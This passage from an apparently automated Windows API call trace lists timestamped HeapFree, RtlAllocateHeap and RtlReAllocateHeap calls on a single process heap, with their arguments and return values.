dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0287.868] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.869] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0287.872] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0287.872] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0287.873] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.873] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0287.907] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.908] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.908] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0287.908] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0288.194] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.199] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.202] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.202] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0288.207] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.208] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.209] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.428] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.432] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.435] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.438] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0288.438] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.611] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.629] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.635] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.636] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4087ee8 | out: hHeap=0x470000) returned 1 [0288.639] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4047ec8 | out: hHeap=0x470000) returned 1 [0288.639] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0288.660] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0288.676] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0288.701] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0289.638] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4077ee0, Size=0x20000) returned 0x4077ee0 [0290.182] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40d7ef8 | out: hHeap=0x470000) returned 1 [0290.533] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0290.533] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40d7ef8 | out: hHeap=0x470000) returned 1 [0290.533] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c7ef0 | out: hHeap=0x470000) returned 1 [0290.543] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0290.546] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0290.549] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0290.549] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0290.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0290.697] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0290.712] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0291.198] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4077ee0, Size=0x40000) returned 0x4077ee0 [0291.604] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0291.605] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4067ed8 [0291.610] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0291.764] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40b7ee8 | out: hHeap=0x470000) returned 1 [0291.779] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40b7ee8 | out: hHeap=0x470000) returned 1 [0291.780] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40b7ee8 | out: hHeap=0x470000) returned 1 [0291.819] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40b7ee8 | out: hHeap=0x470000) returned 1 [0291.820] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0291.912] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c7ef0 | out: hHeap=0x470000) returned 1 [0291.921] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c7ef0 | out: hHeap=0x470000) returned 1 [0292.160] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0292.169] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40d7ef8 | out: hHeap=0x470000) returned 1 [0292.176] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40d7ef8 | out: hHeap=0x470000) returned 1 [0292.416] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40b7ee8 | out: hHeap=0x470000) returned 1 [0292.419] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40b7ee8 | out: hHeap=0x470000) returned 1 [0292.419] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40b7ee8 | out: hHeap=0x470000) returned 1 [0292.419] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40b7ee8 | out: hHeap=0x470000) returned 1 [0292.423] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40b7ee8 | out: hHeap=0x470000) returned 1 [0292.451] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0292.714] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0292.755] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0292.766] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0292.790] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0292.799] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0292.804] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0292.809] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0292.814] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.223] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.444] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.489] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.712] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.730] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.742] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.749] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.770] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.773] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.779] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.783] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0293.787] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0293.920] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.002] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4077ee0, Size=0x80000) returned 0x48d1020 [0294.013] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.016] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.390] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.392] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.394] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.396] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.399] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.404] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.409] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.789] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0294.795] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.821] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.824] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.826] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.829] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.832] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.837] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.839] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.983] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.988] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.993] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4147f28 | out: hHeap=0x470000) returned 1 [0294.993] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0294.993] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40e7f00 | out: hHeap=0x470000) returned 1 [0294.998] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40e7f00 | out: hHeap=0x470000) returned 1 [0295.011] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0295.016] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0295.022] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0295.449] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0295.458] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0295.461] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0295.464] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0295.467] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0295.817] HeapFree (hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20) [0295.817] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0295.823] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0295.830] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4137f20 | out: hHeap=0x470000) returned 1 [0295.834] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0295.838] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0295.842] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0295.847] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0295.851] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0295.855] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0295.860] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.201] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.206] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.257] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.261] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.270] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.272] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.279] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.287] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.288] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.292] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.296] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.301] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.645] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.670] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.672] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.675] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.677] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.680] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.683] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.685] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.688] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.845] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.851] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.857] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.868] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.872] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.873] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40e7f00 | out: hHeap=0x470000) returned 1 [0296.895] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.919] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.925] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.929] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.935] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.940] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.946] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.952] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0296.953] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.266] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.287] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.291] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.294] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.298] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.301] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.329] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.562] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.567] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.576] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.582] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.589] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.595] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.601] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.850] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.862] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.870] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40f7f08 | out: hHeap=0x470000) returned 1 [0297.880] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.890] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0297.897] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0298.379] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0298.400] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0298.826] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4107f10 | out: hHeap=0x470000) returned 1 [0301.106] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.519] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.519] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.519] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.552] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.552] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.552] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.552] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.552] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.552] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.553] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.553] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.553] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.553] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.553] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.553] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.553] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.553] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.554] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.554] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.554] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.554] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.554] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.554] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.554] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.555] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.556] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.556] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.556] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.556] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.556] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.556] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.556] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.556] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x413aaf8 | out: hHeap=0x470000) returned 1 [0301.557] HeapFree (in: 